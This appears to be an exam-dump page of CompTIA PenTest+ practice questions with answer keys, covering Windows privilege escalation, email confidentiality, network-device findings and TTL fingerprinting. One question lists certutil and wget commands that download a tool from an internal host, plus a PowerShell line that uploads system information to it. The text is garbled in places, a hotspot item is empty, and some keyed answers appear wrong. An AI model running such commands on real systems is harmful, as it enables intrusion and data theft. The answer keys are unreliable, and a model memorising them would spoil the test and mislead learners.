CompTIA PT1-002 Exam Questions
CompTIA PenTest+ (Page 3 )

Updated On: 21-Feb-2026

A penetration tester has obtained a low-privilege shell on a Windows server with a default con guration and now wants to explore the ability to exploit miscon gured service permissions.
Which of the following commands would help the tester START this process?

  1. certutil "urlcache "split "f http://192.168.2.124/windows-binaries/accesschk64.exe
  2. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/upload.php', 'systeminfo.txt')
  3. schtasks /query /fo LIST /v | nd /I Next Run Time:
  4. wget http://192.168.2.124/windows-binaries/accesschk64.exe "O accesschk64.exe

Answer(s): B


Reference:

https://infosecwriteups.com/privilege-escalation-in-windows-380bee3a2842



HOTSPOT (Drag and Drop is not supported)
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were agged as malicious.

INSTRUCTIONS:
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:

  1. See Explanation section for answer.

Answer(s): A

Explanation:



Which of the following protocols or technologies would provide in-transit con dentiality protection for emailing the nal security assessment report?

  1. S/MIME
  2. FTPS
  3. DNSSEC
  4. AS2

Answer(s): A


Reference:

https://searchsecurity.techtarget.com/answer/What-are-the-most-important-email-security-protocols



A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key ndings are as follows:
* The following request was intercepted going to the network device:

GET /login HTTP/1.1 -
Host: 10.50.100.16 -
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0

Accept-Language: en-US,en;q=0.5 -

Connection: keep-alive -
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
* Network management interfaces are available on the production network.
* An Nmap scan returned the following:



Which of the following would be BEST to add to the recommendations section of the nal report? (Choose two.)

  1. Enforce enhanced password complexity requirements.
  2. Disable or upgrade SSH daemon.
  3. Disable HTTP/301 redirect con guration.
  4. Create an out-of-band network for management.
  5. Implement a better method for authentication.
  6. Eliminate network management and control interfaces.

Answer(s): C,E



A penetration tester ran a ping `"A command during an unknown environment test, and it returned a 128 TTL packet.
Which of the following OSs would MOST likely return a packet of this type?

  1. Windows
  2. Apple
  3. Linux
  4. Android

Answer(s): A


Reference:

https://www.freecodecamp.org/news/how-to-identify-basic-internet-problems-with-ping/






Post your Comments and Discuss CompTIA PT1-002 exam dumps with other Community members:

Join the PT1-002 Discussion